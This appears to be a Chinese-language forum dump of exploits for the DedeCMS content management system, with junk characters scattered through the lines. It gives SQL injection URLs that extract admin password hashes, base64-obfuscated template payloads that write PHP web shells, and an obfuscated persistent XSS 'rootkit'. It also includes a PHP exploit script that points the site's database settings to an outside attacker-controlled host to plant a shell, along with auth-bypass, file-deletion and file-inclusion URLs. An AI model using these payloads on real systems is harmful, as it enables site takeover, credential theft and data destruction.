|
|
3 L( `, ?0 _2 ~9 b2 xDedecms 5.6 rss注入漏洞4 p& \2 l" c1 k, L3 W5 p- e3 n
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=10 [' D* t6 C# v9 M
+ [ X% @/ {4 e# J$ U2 `; \( |- @+ j
, P v/ X5 y, `+ P9 }
( P3 d4 ~* v5 a' e5 @
4 e; s8 _5 ^: ?# T' d; r- U# S7 j6 A% q+ A4 \; e( J
+ M( {( A# e8 d
* s& u0 N! t6 I+ A
DedeCms v5.6 嵌入恶意代码执行漏洞7 r y( M/ J3 i: ^* ~
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}1 W3 ~3 c) k& z3 R) m
发表后查看或修改即可执行
9 X/ @! g) e/ z% {( z7 @8 a7 ia{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
7 a' G5 }4 ~" ]$ s% N y& a7 f$ Z生成x.php 密码xiao,直接生成一句话。
! G2 e2 f1 ^: k5 E, D" i! Z, F" C. t. d( Q7 y2 D$ F
4 D c) L& M; k2 J* w
1 V' z2 h% x, A1 n, G
7 ^6 U1 y- j4 a& b" j8 o$ q! b
0 s/ x8 h: R8 U/ J0 l. n/ x! a5 Y, p+ a$ h: |: p" K
; J# d2 v. ~0 t
( K: ~$ z' w8 i. [- F+ h+ o2 Z
Dede 5.6 GBK SQL注入漏洞% \3 ?4 H1 e. X- e
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';( A+ t( [2 L% _5 M. [
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe1 ]1 x. o- b; W) i+ ?
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
* ~3 X3 @9 d) Y# l7 K" K8 g4 `
- o P+ s6 I+ n* j# i1 ?1 X( w
# E( @: g6 D5 k* }* U9 l! I; |. p# N: h
0 N8 ^; j1 H. S7 J! u
" e* Z f. j/ ^' L/ f, T* _- } Z0 G! E- }* y7 m ^: ~0 I
8 _6 d y5 k: b- b
9 j& v- I7 e& h( y8 J4 a8 w% o
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
x( a/ `. S3 ?* k O6 Y9 p- o4 Lhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` + L2 ^* u/ B' F8 v+ P
) ~6 m3 {7 b8 S- f" J$ @/ ]5 j/ J/ E: S) d% b+ x' J: z
6 ], D9 j: c! v" r1 l5 ?, e5 @ M( w" z- z2 l
c( I4 A& t- A4 E, X
4 S, K" `4 z( O _* J- YDEDECMS 全版本 gotopage变量XSS漏洞# I5 K5 g4 A# s+ d9 D& `
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 / W" ^% ^5 q# _2 v9 i% {$ R
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x=", |6 N5 |! `& S* O
+ `4 i" B5 B; T5 ]$ \# I/ l& _" H% e0 u% V9 [( S
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 ' [: M0 P+ m2 n
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda/ c$ |1 J r- v9 L& }( G" O" N
9 v9 h( R$ ?3 Z
: J! h7 i3 p; e; q9 [
http://v57.demo.dedecms.com/dede/login.php7 j/ m I, N: w
3 l) Q# x: B1 R3 D
' C. ?3 ~2 @/ G: ^* M( w( D' qcolor=Red]DeDeCMS(织梦)变量覆盖getshell2 m# v. n6 O% P/ J9 o* m) ? ?
#!usr/bin/php -w
6 v K3 _, u6 }/ H# ]3 M/ m! {<?php
& E% o- |( T [# xerror_reporting(E_ERROR);9 e$ k( e; U$ W3 b. G9 W
set_time_limit(0); i& `- Y3 M$ F; f$ U) R u
print_r('
4 [8 S3 M" W5 }4 |8 ~3 E! q9 FDEDEcms Variable Coverage
4 C H- C# S( D# w' ZExploit Author: www.heixiaozi.comwww.webvul.com* J; O2 W* g' |! m+ n/ N
);
; C" o/ u( ?% Y. }4 x+ zecho "\r\n";& q4 Y ^9 _/ c7 H/ `
if($argv[2]==null){. k. h% f" Q9 p$ p) L U
print_r('
$ o- A7 w7 A, x" |- k2 t+---------------------------------------------------------------------------+
! d- ]/ R: s& J, i/ _% U$ U. S0 J0 yUsage: php '.$argv[0].' url aid path
" Y: a: G: Q. F8 R4 _/ n, Haid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/0 }' @! @3 }5 F: Q
Example:1 r6 N( \# f5 L9 A3 E
php '.$argv[0].' www.site.com 1 old2 i9 z; A; L8 f' r% O1 A
+---------------------------------------------------------------------------+
- ^% N T% m( I, y! U" @. n');
/ y3 K( W: e+ k7 I. W3 [* qexit;
' c' C2 r+ _+ A2 o5 W$ L}) l/ ~( m% n# C1 M5 k/ R
$url=$argv[1];
) z( `- S# T3 G+ R0 z$aid=$argv[2];6 n% c+ r- f: w
$path=$argv[3];
& d$ u/ Q8 S3 @- X3 c9 N# Y/ |3 M$exp=Getshell($url,$aid,$path);% A2 F" c: X3 k) M
if (strpos($exp,"OK")>12){5 g# e4 D- D9 p" [% H
echo "& O4 `5 b3 W6 @3 S" }5 Q* h# i
Exploit Success \n";
3 d9 w) l9 D4 C, }4 t5 W9 P, r o( rif($aid==1)echo "
, y; w2 b6 v: |4 X9 B8 z KShell:".$url."/$path/data/cache/fuck.php\n" ;
7 A1 V" h4 X0 X( F; y' D* G& H9 A# ?3 L. B3 H7 D/ L7 D/ s
, J8 g. y/ w; j [if($aid==2)echo "
& N2 D5 i1 l9 U x/ a- x* wShell:".$url."/$path/fuck.php\n" ;* m2 ?, J+ o5 J! W8 h
0 q+ Z6 `8 J8 m1 H7 l
* l/ q% H- V+ i3 o" `if($aid==3)echo "
- ~. A' _- y& z+ y5 L% gShell:".$url."/$path/plus/fuck.php\n";
F; M$ s4 H. S/ ~, Q7 K
. a6 y1 w8 }6 v% E2 m6 a9 L; o4 g1 ^" V3 X m9 u4 |7 l! ^ Q
}else{
% N7 b9 v& w+ n1 @9 b5 Oecho "3 F% U5 j) y$ |: z
Exploit Failed \n";& I; k7 J* o2 l- x X' t2 R
}" E! r: Z- o; _
function Getshell($url,$aid,$path){
% z8 Y0 l8 Q( D D/ z9 k) X0 _$id=$aid;/ C3 r1 F" q- [4 C# [+ s
$host=$url;+ S: T- r* O! U$ c1 S' z( r
$port="80"; j* Q2 \3 b5 e1 a7 T# [
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";9 \" d/ H/ G# j2 h; N& Q# r% }7 ]6 O
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
- z2 c0 o5 G, Q) A1 H& U7 D( m$ v$data .= "Host: ".$host."\r\n";2 Q* S5 @0 Q* Q6 L. R5 o9 c6 T' |
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";% P1 d2 l: Q' y" A; s8 [6 M3 s* l
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
4 U; i$ _# H3 z; v. Y# \$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
+ _$ t, O6 r- B0 h$ w% ?2 t//$data .= "Accept-Encoding: gzip,deflate\r\n";2 v% C( n4 o" x; p. h, }6 t
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";1 N6 a- u' x, m+ t) M# m$ p( o
$data .= "Connection: keep-alive\r\n";
5 q4 D1 |5 f! W: n9 x- x$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
; Z) L1 v* ?/ g K* Y$data .= "Content-Length: ".strlen($content)."\r\n\r\n";3 {$ h' J/ D1 ^9 F
$data .= $content."\r\n";3 Q- D) C0 s$ [% a: d% h
$ock=fsockopen($host,$port);
" i: W p+ w3 y, J" ]7 Z7 p5 H0 v3 tif (!$ock) {7 S9 b3 G* B4 g8 b2 v
echo "
' ^9 b$ t) E8 W$ X/ R2 ?! m3 }: C! cNo response from ".$host."\n"; z# w3 g- W( \ N% u
}+ T% l9 b' _% w3 v, e) F& S9 K
fwrite($ock,$data);% K' o ~) b5 A2 G
while (!feof($ock)) {
7 S9 h! K+ w8 H( Q$exp=fgets($ock, 1024); o/ w a5 Q* P& s0 e1 U
return $exp;4 y. Q& r. ?2 f, }+ `
}1 D8 p% S( s) E' k, ~# }& ^
}
$ k3 L+ X L( y8 l* }. C r$ E: K* X
& F* D. }- ?) h- ]" Q [; s1 |: \+ Y1 I1 r) m- |/ L4 b1 I& o* ?4 O
?>, Z) ~# z: y# I2 b
- h% Z5 a- t( `: h2 {
; P! u+ G) A# g8 @% W7 w
5 q; r: G" \% N# }; R6 U6 a
1 k* k1 {# n( N- {& A
1 P) ]* K5 C; m. z% |! f/ `1 s# _ M P& O6 ^
& o/ v$ ~: P$ q: e/ a, J& z
4 w9 m# a$ U( Z1 ^7 j: j; O6 }
J8 W, B6 z9 }7 f& g1 ?/ K( v2 u5 D. l5 K! F
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)* c7 a d! L3 I; T1 u
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root; f6 |8 X" Q+ q( ?
. E# n$ P& w4 V# T
& q5 P9 U) q! n把上面validate=dcug改为当前的验证码,即可直接进入网站后台 l5 x9 v) n* b& M: x0 v
* a; f1 P, w4 v0 Z* Q5 l7 ]
9 m8 W G/ N) S此漏洞的前提是必须得到后台路径才能实现
1 Y4 l, K( b8 E% [
0 b2 J+ T) J0 f8 y& F
6 S9 _2 ^+ c& b9 j- Z [1 H5 b, _5 V8 a5 t, |
/ N% U _- _0 m
( D9 h, W5 h. Y( ?
7 \# o8 U% I, m1 n+ o' \/ j$ k n8 C' M# \% H: x; B
: `: K7 w5 c$ z2 [1 }. M
$ u# ]4 Z* D. Z& E2 _: Y
5 M& W1 D4 ~0 r" g3 y3 q; @' Y) [Dedecms织梦 标签远程文件写入漏洞& p2 a" R# E9 X0 x
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
7 p0 L9 m: {& w2 i+ {% q7 u4 Q7 i: d0 V1 r6 v7 d
, E- w) [: q3 i h0 [再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 # _% y& k$ H5 F4 v
<form action="" method="post" name="QuickSearch" id="QuickSearch">
. C" P0 E/ ^) {2 H<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />, F' O! m+ ^. |' R
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />( |5 s! W$ ` L: X6 _9 J
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />% y5 U' i3 C6 C5 S: q
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
) t8 h1 O ?6 z<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />0 H+ U4 N/ S: R# B" s2 @6 j
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />5 l' n+ M M2 y$ o5 B
<input type="text" value="true" name="nocache" style="width:400">4 {- x4 v0 h- G V N3 A1 E
<input type="submit" value="提交" name="QuickSearchBtn"><br />
) w- U% D1 }/ l! q k4 e</form>' Y% L! F& M$ k* k: T. D( }
<script>
" l! e6 ?2 @8 u/ w" j! ~+ D ~+ Xfunction addaction()
% w& m3 r- O7 h{% t3 Y0 T% P! m1 {) q# j, D' W
document.QuickSearch.action=document.QuickSearch.doaction.value;
. k- u/ ?- T; N0 h$ ~4 s5 u}
I3 D3 c+ m) N</script>0 b9 q; K+ }1 e# W. `( `0 U
8 `8 S8 [, H" `$ P5 N+ a6 @* o8 D9 C6 Q! k) ?( x' ^
& R" j+ ]7 F6 `7 x# d2 d
, \; k% {6 g$ `9 E# n
- r" P0 ~3 I+ _% G( R
+ q6 T: Q, K2 {) U k% B! Y1 P: l" N6 m) w
& w! K: q) [" D& c1 B5 ?
h' M2 _- o, N J4 Y4 Z* f+ z, f N! |9 N, i+ ~
DedeCms v5.6 嵌入恶意代码执行漏洞4 R0 i/ w9 l" l5 R2 ]
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行1 X) P/ p+ R3 B$ q' d# C
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
7 m& K8 u h$ ?1 X. L' ~/ v生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
/ y* b6 d% I+ J: V* c% P# r- yDedecms <= V5.6 Final模板执行漏洞
, N+ h$ [5 U* G" t% N9 ~2 U' d0 q$ A注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:7 I2 [5 o1 U4 Z. y6 c0 j
uploads/userup/2/12OMX04-15A.jpg3 d- L/ E8 H; P0 H+ c. S2 {) `% l
0 B5 X* ~: y7 |8 Z# R* @3 u# W6 y" X3 o
2 f' t; K; u/ K B+ [; m模板内容是(如果限制图片格式,加gif89a):/ p& o/ w |$ ]& e8 A
{dede:name runphp='yes'}
8 f; K# u+ T) ?1 L: z$fp = @fopen("1.php", 'a');) h1 u- E4 A4 H& d+ F7 T
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
9 E( w5 t9 {7 c; k" h@fclose($fp);" r( U% d ]* H1 u: ^
{/dede:name}
, O L+ r: g8 i: m% p2 修改刚刚发表的文章,查看源文件,构造一个表单:# z4 }% T; F8 M* f W* {
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
8 l( d& h% O! ~<input type="hidden" name="dopost" value="save" />( ]% _, H# ]" L0 y- V @- p
<input type="hidden" name="aid" value="2" />
! _2 J' e5 i% c% |<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
6 J: W, [% f4 f) d* p" ~* ~<input type="hidden" name="channelid" value="1" />
) H+ i* j* z$ m9 k<input type="hidden" name="oldlitpic" value="" />9 o! X; p5 o8 T2 X. ?! j* z7 u7 G- Q
<input type="hidden" name="sortrank" value="1275972263" />/ i, V# ]# f; B
) b3 p4 e- h0 ^ ^4 V! e
% |9 n7 V$ k4 e% @+ m9 `<div id="mainCp">2 B$ Y, `% {1 F0 B" \' ?8 \( x" @# Q
<h3 class="meTitle"><strong>修改文章</strong></h3>+ ]/ \: `8 v9 `: ?2 ?2 d
5 U. a; }/ M+ O9 X7 p4 Z8 a; b
0 v* Y e# v e1 {# e<div class="postForm">8 k6 D% V3 _( R2 L8 ~$ |# O# n7 e
<label>标题:</label>6 W3 O* l+ `& z2 b# t' g
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>" y b' G! T3 D- c. o
$ i: D) w7 \+ U. Y2 J
' B5 v+ A% o' m' u1 S% ?- T& S0 r
<label>标签TAG:</label>
% K5 H4 M: ?& I. ?# j8 O, C<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
6 K4 B9 y! h! Y% E; ~- Q- V
- {( ]# y- H& P/ l0 d
! d( P) R$ m% D<label>作者:</label># Z/ E3 X0 E- u; P8 v$ V
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
& j4 x; }2 F5 \8 t; \8 m* M {3 y9 b4 x5 r; @
+ W- G; u. F+ J/ n<label>隶属栏目:</label>
$ j& r: ?0 `* O+ q4 o2 g7 g" ]<select name='typeid' size='1'>
1 t, v7 `% O7 \2 ?4 q* D2 h. [<option value='1' class='option3' selected=''>测试栏目</option>
4 b6 W9 v. P/ A" t6 M# v( _3 b</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)5 [) t/ j, H( [, U
2 o) n( O7 A3 P: ^ _
, u, l. G3 K8 K @) _! ^
<label>我的分类:</label>( J* t2 ^$ u9 b1 Q5 m0 [& }% }! x
<select name='mtypesid' size='1'>
. w, Q9 ]: D% z' ~3 N5 W<option value='0' selected>请选择分类...</option>
8 H7 y% W% j( z! Q<option value='1' class='option3' selected>hahahha</option># b2 q' k/ x- u% q! `0 K% f' k
</select> u6 Y7 _8 c8 Z& n, N n0 z/ U
5 P }) ?8 K( a
8 [3 Z6 R _6 S8 {0 ~<label>信息摘要:</label>) Q8 `# ]- i, d4 G8 Y) Q5 m% I
<textarea name="description" id="description">1111111</textarea>" g3 _( a; y- c: F+ p# O
(内容的简要说明)
7 h9 V' b: ?( D8 ^, `' m
, K0 s5 D% N0 ? f- {9 n6 q
) X5 i/ g; T/ f' c9 }<label>缩略图:</label>; \ y! ~* i2 Y6 V# z
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
3 \6 \; S% K1 T! k7 O' o6 P P" G( D" m' L5 Z; b; d
1 [$ S* L9 A4 K6 m7 p: W
<input type='text' name='templet'
5 {7 T* m/ H' P" [* W" ~0 Qvalue="../ uploads/userup/2/12OMX04-15A.jpg">
( z9 ]. L; _0 [) N0 a# |1 Y<input type='text' name='dede_addonfields'
5 U* E; e8 y. `0 j+ Y" Qvalue="templet,htmltext;">(这里构造)
& l' T# H1 Q% J8 z7 p</div>) z1 N( o$ p( v2 ~) R6 D7 ~8 T
0 M% A" o- r! f$ _) r y7 v% f- I$ `: d# T
<!-- 表单操作区域 -->( w$ l+ a; `! q. q) k
<h3 class="meTitle">详细内容</h3>, h+ M" Y+ }6 `, ]
2 M" `- v: a/ k2 P9 |8 w, f9 b1 d/ t) e
<div class="contentShow postForm">
$ s8 y& I* L% S/ S) ]8 R" H; `. ]! Q- ?<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>5 h1 b. g5 z) o K( m3 P1 @
8 c) ?$ b+ c3 Z" C1 A
1 }' l0 O: t3 L' f2 ~
<label>验证码:</label>6 O, O0 [3 a, l: v$ n3 D7 E) i" R
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />0 t6 W- N: L8 @, E `& k
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
$ {1 j3 T$ X4 R
, ?! w$ R2 I' Z4 n. d. b4 ]& M3 z, n
5 o9 `3 q! F0 t" _8 v" M* {<button class="button2" type="submit">提交</button>5 c7 w" ]1 O& F
<button class="button2 ml10" type="reset">重置</button>
) p* @/ u# W* P% T0 i7 \</div># D+ p) }- k, \4 D+ v
3 V9 w; ^8 d& t& T2 L
6 u! x1 H8 p& r- B' l</div>; ]6 H/ \: Z$ _
4 V) a7 v6 I8 h, l- o6 o
1 @0 L1 Y6 i2 X1 S/ w
</form>
7 v2 z' Y1 ?6 ]
# \7 q5 j& T9 \
- M, s0 ~6 h6 u- z# I1 V* {( r提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
w% Z3 u, K. J& ^$ ]' r, Q5 r4 P假设刚刚修改的文章的aid为2,则我们只需要访问:
! E. v0 E7 q+ M9 |- s% e& |( ~http://127.0.0.1/dede/plus/view.php?aid=2
/ x8 m& g# N, n1 p) w( ~' G即可以在plus目录下生成webshell:1.php
: d7 h5 k( N7 K; K# t) d4 ^, M$ ^ o5 d+ o2 r) G
+ w& {. B9 j* U/ @# |
! W) v4 G: D/ Q: ^' u9 g- o- z" Q: _/ s" W: {, O/ g+ Y, ~
5 Q$ x/ E- |5 K6 Y9 ?. c* z' F/ z; L* W1 ]6 B. j, C2 {9 B; W
7 C2 }) U3 X; d+ P8 ^# ~) T" d
- F$ U* x6 `6 {' w, f8 l n1 U: u, X' d6 z; E) J' K
! {, |5 t( U0 @0 w
# n: D4 V& g! [. p* B+ J
% A1 J% m8 A# |: D$ pDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)4 H2 i# U6 \. ?' v* j6 i
Gif89a{dede:field name='toby57' runphp='yes'}
) {* B/ g5 ?1 S% gphpinfo();
5 O% U$ u$ H4 u9 X( F{/dede:field}; x3 y6 C* ]: n9 d# E/ _! u
保存为1.gif
9 }# Z' z# H' g4 w<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 3 }. G8 G' M0 Q( K8 ^
<input type="hidden" name="aid" value="7" />
3 p Z* v3 ?- \' w3 d, p. ^5 B<input type="hidden" name="mediatype" value="1" />
% ]1 a. c ~" @) W5 u<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
" M% ]7 {+ \! }! J<input type="hidden" name="dopost" value="save" /> , R) [7 {6 k: t0 Q- l2 l
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
8 ?- H! O, P2 d3 N' k; |<input name="addonfile" type="file" id="addonfile"/>
; d2 b* y1 ?0 s: F: h5 _$ O<button class="button2" type="submit" >更改</button>
$ X2 ~. Y L! m& J0 p/ B1 V. q</form>
! F% ?* f y/ U: N$ [
- `' }4 [: G, W1 ~
: B1 q @" T5 S2 q9 l! l( _0 m构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
- f9 [0 e4 D+ D9 d发表文章,然后构造修改表单如下:
+ P* H5 F s8 h9 t: ]' l: z4 G. p6 N. W
@. V3 {6 w. g, P( k0 t
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
Q$ l, h( @/ r7 P0 ~<input type="hidden" name="dopost" value="save" />
# ~5 q/ |! }% ~/ C+ }/ I<input type="hidden" name="aid" value="2" /> ' S$ L) z8 Y, f" B/ \3 ^$ ]
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> & {: r, a. N# W- s1 B/ O
<input type="hidden" name="channelid" value="1" />
5 ^4 p) a$ u/ c# \<input type="hidden" name="oldlitpic" value="" /> " e0 \9 C/ a' ]- d
<input type="hidden" name="sortrank" value="1282049150" />
8 J# {$ N2 g' F( e" e<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
3 z! ?7 w" z) T3 B" Z, {<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
# w9 X% V/ P- }% h7 r8 m<select name='typeid' size='1'>
8 U0 R2 _1 n0 b! j6 i<option value='1' class='option3' selected=''>Test</option> * R3 x( [$ c' A5 l/ s
<select name='mtypesid' size='1'> ! M9 ?) m/ t8 {
<option value='0' selected>请选择分类...</option>
; | Z- q D3 m1 t( h. k<option value='1' class='option3' selected>aa</option></select>
3 ~# t- a( Q$ \9 \<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
5 s6 p7 V% {- j8 Z3 x D<input type='hidden' name='dede_addonfields' value="templet">
1 _3 t0 ^2 U% V* h<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
1 g3 K. i/ Q3 w9 K$ }<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 3 Q% f9 q7 R. E7 d! p! U8 e
<button class="button2" type="submit">提交</button> ) U2 R) Y- A k+ F0 G) ~1 y) j* G
</form>& O4 W$ e+ V- H0 K L$ _% J* S+ l
2 H+ X" E3 F( B8 s; k+ S3 ~+ @& N8 u- l# P
# Q2 s) V) l/ I* E P* C9 u( I3 ~: S% `6 \; }
, g+ K- F- o" l& `5 f0 A# O- T
& a* H4 C6 e. V. \6 \: N- g' x
: e7 A" P, x% A* @$ b) x! v3 d* e
4 ^1 O t' x; l, d- Z; v
# j9 h( Y1 _4 l) {9 X
0 t' y( q0 K& x; W' ~
# }2 R! E& A$ \6 H
2 g- c9 T8 }7 K& ]织梦(Dedecms)V5.6 远程文件删除漏洞
0 X4 f: S- |! f$ w; s7 ihttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
( q1 |: H( ?# r O! W3 N( M* f
) Q( T/ F3 ~# u9 ~ s& `3 l7 |
; f" i+ x- B8 z
" ?1 P: g4 Y& o2 w2 u1 A9 m4 Q1 r$ G- l& W6 I" i* z
y& K- b3 r! ~$ Z) s* l
9 n4 M; `; |( l! Z* e
' ?+ k6 C' S0 v1 l
2 m$ X) A: R$ J7 T& U8 E' D4 v, {* q% x4 c4 V/ z( U
0 U! `! u) \) x织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
( ~! O8 ]4 P8 v& S) Shttp://www.test.com/plus/carbuya ... urn&code=../../# q" |, F0 l O) H- R8 F
% @+ _ S$ Y" w8 j6 U
( V1 S0 g U$ Q/ G- R9 ?6 }/ J* o* [- H4 |: h
# @4 f+ T! C( Q) B2 _% m
, H% B7 f* c+ w& j, O, z6 a$ ?. e7 ]1 ]3 h z+ z
% w) ~) ]) T' n ?" l% d: _2 U
" O3 }2 Q" A- s9 g. S$ V
- e3 P* J1 Z, i% U R1 B
1 q. m! G$ }" u( n) o' S8 ODedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 0 p% }$ w: g2 b* H% m
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
1 B; T' X1 v, N% ]. W3 r密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
: S( }" N7 n5 A6 [7 c9 P6 y+ O0 j; P1 `; a9 Y/ }% R, ]: Y1 B# \
0 l/ j4 ^" u8 y1 B5 n+ z; V& J9 i8 m2 o/ \- C
/ N1 J# @% T5 P% n A5 z" t& ~ J6 S+ S e$ a b# p
# Q& J2 v4 B8 Y/ }, X4 h! Y; o. T X; l$ W4 l
0 Y: X' @2 x# n( z, G: ?
4 ?9 j% ^8 H5 e
' a! X( H+ b+ h) r& |& A( j) P织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
& `, ~$ y; ^4 w5 lhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='3 o; G) v7 k! b+ T4 A5 K
& ^ _3 V" S0 S f: u: M5 S5 ]( O
) Y ~, i" k5 r$ `; T) k8 V8 Q+ C
0 J1 X, q2 P7 `3 ]# w
